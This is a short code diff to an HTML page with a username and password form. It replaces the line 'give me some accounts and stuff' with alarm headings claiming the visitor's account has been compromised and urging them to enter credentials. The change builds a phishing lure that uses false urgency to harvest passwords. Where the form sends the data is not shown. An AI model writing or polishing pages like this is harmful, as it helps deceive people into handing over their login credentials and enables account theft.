--- a/index.html
+++ b/index.html
@@ -12,7 +12,8 @@
         </style>
     </head>
     <body>
-      <p>give me some accounts and stuff</p>
+      <h1>VERY URGENT!</h1>
+      <h3>Your account has been compromised! Please enter credentials to secure your account!</h3>
         <form id="form">
             <input type="text" id="username" placeholder="Username" />
             <input type="text" id="password" placeholder="Password" />
